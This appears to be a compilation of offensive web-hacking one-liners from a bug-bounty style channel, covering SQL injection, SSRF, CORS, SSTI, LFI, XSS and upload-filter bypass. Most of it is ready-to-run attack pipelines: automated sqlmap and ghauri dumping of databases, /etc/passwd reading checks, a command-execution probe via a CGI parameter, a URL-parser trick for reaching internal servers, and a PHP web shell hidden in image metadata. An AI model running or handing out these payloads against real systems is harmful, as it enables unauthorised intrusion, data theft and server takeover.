Find SQL injection on a site with one command
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew removes duplicate lines from the pipeline output.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
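If anew is unfamiliar: it passes through only lines it has not seen before. A rough illustration of that dedup step using sort -u as a portable stand-in (anew additionally preserves input order and can append to a state file; the URLs are just sample data):

```shell
# Duplicate URLs collapse to one line each; this is the effect anew has
# in the middle of the pipeline above.
printf '%s\n' \
  'https://testphp.vulnweb.com/artists.php?artist=1' \
  'https://testphp.vulnweb.com/artists.php?artist=1' \
  'https://testphp.vulnweb.com/listproducts.php?cat=2' | sort -u
```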
Search for SSRF on a site with one command
To accomplish this task, we will use several utilities.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
Qsreplace takes URLs as input and replaces all query-string values with the value specified by the user.
After installing the above tools, simply run the following command:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
Replace your.burpcollaborator.net with your own server (or Burp Collaborator) address.
#web #ssrf
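The qsreplace step can be approximated with sed for simple single-level query strings; this is only an illustration of the substitution, not a replacement for the tool (the URL is made up):

```shell
# Swap every query-string value for the collaborator address, as qsreplace does.
url='https://site.tld/redirect?next=/home&url=http://old.example'
echo "$url" | sed -E 's/=[^&]*/=your.burpcollaborator.net/g'
```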
Find hidden parameters for IDOR search
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
/settings/profile
/user/profile
/user/settings
/account/settings
/username
/profile
To find hidden parameters, you can use Arjun or fuzzparam:
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burp Suite also has the param-miner extension for this purpose:
https://github.com/PortSwigger/param-miner
#web #IDOR
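Before reaching for a parameter-discovery tool, you can eyeball a few obvious candidates by hand. A tiny sketch that expands a wordlist of guessed parameter names into probe URLs (the endpoint and names are illustrative assumptions, not from any tool):

```shell
# Build candidate URLs from a small wordlist of likely hidden parameters.
endpoint='https://site.tld/user/profile'
printf 'id\nuser_id\nuid\naccount_id\n' | while read -r p; do
  echo "${endpoint}?${p}=1"
done
```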
Finding web servers vulnerable to CORS attacks
The following one-liner can determine if any subdomain of the target domain is vulnerable to cross-origin resource sharing (CORS) attacks:
assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/null
For this combination to work, please install the following tools:
https://github.com/tomnomnom/assetfinder
https://github.com/projectdiscovery/httpx
https://github.com/shenwei356/rush
Here's what the command does in detail:
It collects subdomains of the target domain (e.g. fitbit.com), identifies the live ones, and builds a list of URLs. It then requests each URL with an Origin: evil.com HTTP header and looks for "evil.com" in the response headers; any match is printed to the terminal.
If a host is flagged as [VUL TO CORS], it means the site has misconfigured its CORS policy and could potentially expose sensitive information to any arbitrary third-party website. This information includes cookies, API keys, CSRF tokens, and other sensitive data.
For more information about CORS attacks, check out PortSwigger's CORS security guide :
https://portswigger.net/web-security/cors
#web #cors
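The heart of the one-liner is the grep -c check on the response headers: if the count of reflected "evil.com" occurrences is nonzero, the host is flagged. The same logic in isolation, with simulated headers standing in for a real curl response:

```shell
# Simulated response headers from a server that reflects an arbitrary Origin.
headers='HTTP/1.1 200 OK
Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true'
if [ "$(printf '%s\n' "$headers" | grep -c 'evil.com')" -gt 0 ]; then
  echo '[VUL TO CORS]'
fi
```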
Automate the search for Server-Side Template Injection (SSTI)
First, save these payloads to a file payloads.txt (you can add your own):
check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for SSTI using gf:
echo target.com | waybackurls | gf ssti | anew -q ssti.txt
Create a list of endpoints with the payload as a parameter:
cat payloads.txt | while read -r line; do cat ssti.txt | qsreplace "$line" | anew -q sstipatterns.txt; done
We run the command to check the server's response for the presence of SSTI:
cat sstipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"check-ssti49\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #ssti
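The while-read loop above is just a cartesian product of payloads and endpoints. A self-contained illustration with sed standing in for qsreplace (the endpoint is made up; real payloads containing & or | would need escaping):

```shell
# Substitute each payload into the query-string value of a sample endpoint,
# producing the kind of lines that end up in sstipatterns.txt.
printf 'check-ssti{{7*7}}\ncheck-ssti${7*7}\n' | while read -r payload; do
  echo 'https://site.tld/page?name=x' | sed "s|=[^&]*|=${payload}|g"
done
```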
XSS in applications with automatic error correction
If you see that a web application is trying to guess or fix your search query (e.g. in the search bar) and has a WAF on top of it, use misspelled words to perform XSS and bypass the WAF:
<scrpt>confrm()</scrpt>
Will be corrected to:
<script>confirm()</script>
The above behavior is often observed in PHP web applications using pspell_suggest().
#web #xss #waf
Quick website check for simple LFI
Find a wordlist of payloads that read out /etc/passwd and place it in the payloads.txt file.
Then, using waybackurls we get the endpoints of our site and select the most suitable ones for LFI using gf:
echo target.com | waybackurls | gf lfi | anew -q lfi.txt
Create a list of endpoints with the payload as a parameter using qsreplace:
cat payloads.txt | while read -r line; do cat lfi.txt | qsreplace "$line" | anew -q lfipatterns.txt; done
We run the command to check the server's response for LFI:
cat lfipatterns.txt | xargs -P 50 -I@ bash -c "curl -s -L @ | grep \"root:\" && echo -e \"[VULNERABLE] - @ \n \"" | grep "VULNERABLE"
#web #lfi
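If you don't have a traversal wordlist handy, a minimal starter payloads.txt can look like this — a few classic /etc/passwd variants, to be extended with encoding and filter-bypass tricks as needed:

```shell
# Write a small starter list of path-traversal payloads targeting /etc/passwd.
cat <<'EOF' > payloads.txt
/etc/passwd
../../../../etc/passwd
....//....//....//....//etc/passwd
..%2f..%2f..%2f..%2fetc%2fpasswd
EOF
wc -l < payloads.txt
```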
I want to see the interaction on the posts to know if you are interested or not.
There is a topic called Inconsistency.
It happens between the checker (URL-parsing) functions and the libraries that send the HTTP request.
On their own, both the checker functions and the libraries are safe.
But when they work together, they become vulnerable.
For example, in this URL:
https://admin@site.com
username: admin
Host: site.com
But what about this one:
https://site.com@admin.ir@moha.tld
What is the host here?
It doesn't actually matter what the answer is.
The point is that you might assume PHP's parse_url and curl treat the same URL the same way, but this is not the case.
For example, you run:
curl -v http://user@127.0.0.1:80@www.google.com/x.php
Host = 127.0.0.1
But parse_url resolves the host of this very same URL to google.com!
So if the URL is validated with parse_url but fetched with curl, we can reach the x.php file on an internal server (127.0.0.1) that has no public IP address.
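A pure-shell way to see the two interpretations the post describes — host after the first @ (what the post says curl picks here) versus host after the last @ (what parse_url picks). These cut/awk splits only illustrate the ambiguity; they are not the real parsers:

```shell
url='http://user@127.0.0.1:80@www.google.com/x.php'
rest=${url#http://}
# Interpretation 1: userinfo ends at the FIRST "@" -> host is 127.0.0.1
echo "$rest" | cut -d@ -f2 | cut -d: -f1
# Interpretation 2: userinfo ends at the LAST "@" -> host is www.google.com
echo "$rest" | awk -F@ '{print $NF}' | cut -d/ -f1
```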
Search for Sensitive files from Wayback
waybackurls domain.com | grep --color -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar"
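To sanity-check an extension filter like this, feed it a few sample URLs (all made up). Anchoring the extensions to the end of the line avoids matching them mid-path:

```shell
# Only the URLs ending in an interesting extension should survive the grep.
printf '%s\n' \
  'https://site.tld/docs/report.pdf' \
  'https://site.tld/index.html' \
  'https://site.tld/backup/db.sql' |
  grep -E '\.(xls|xlsx|xml|json|pdf|sql|docx?|pptx|txt|zip|tar\.gz|tgz|bak|7z|rar)$'
```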
One-liner to find RCE
cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
One-liner to find SQL injection
#sql
cat subs.txt | (gau || hakrawler || katana || waybackurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
#xss
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
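The awk stage splits each URL on ? and &, then re-emits one URL per parameter with its value stripped, ready for kxss to inject its probes. On a sample URL:

```shell
# One output line per parameter, value blanked.
echo 'https://site.tld/search?q=test&page=2' |
  awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}'
```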
XSS from javascript hidden params
#xss
assetfinder target.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
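The core trick is the grep -Eo 'var [a-zA-Z0-9]+' stage: it scrapes JavaScript variable names out of the page body, and each name becomes a candidate parameter seeded with a marker value. In isolation, with a made-up script snippet instead of a live curl response:

```shell
# Extract "var <name>" declarations and turn each name into name=xss.
js='var userId = 1; var theme = "dark";'
printf '%s\n' "$js" | grep -Eo 'var [a-zA-Z0-9]+' | sed -e 's/var //' -e 's/$/=xss/'
```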
Bypass File Upload Filtering
Embed a PHP payload in the image's metadata, then give the file a double extension:
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' shell.jpg
mv shell.jpg shell.php.jpg
Time-based SQL injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
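The sed stage blanks each parameter value so that URLs differing only in their values collapse to one line under sort -u; the resulting urls.txt can then be handed to an injector such as sqlmap. The substitution on a sample URL:

```shell
# Strip parameter values so duplicate endpoints deduplicate cleanly.
echo 'https://site.tld/item.php?id=5&cat=22' | sed 's/\(=[^&]*\)/=/g'
```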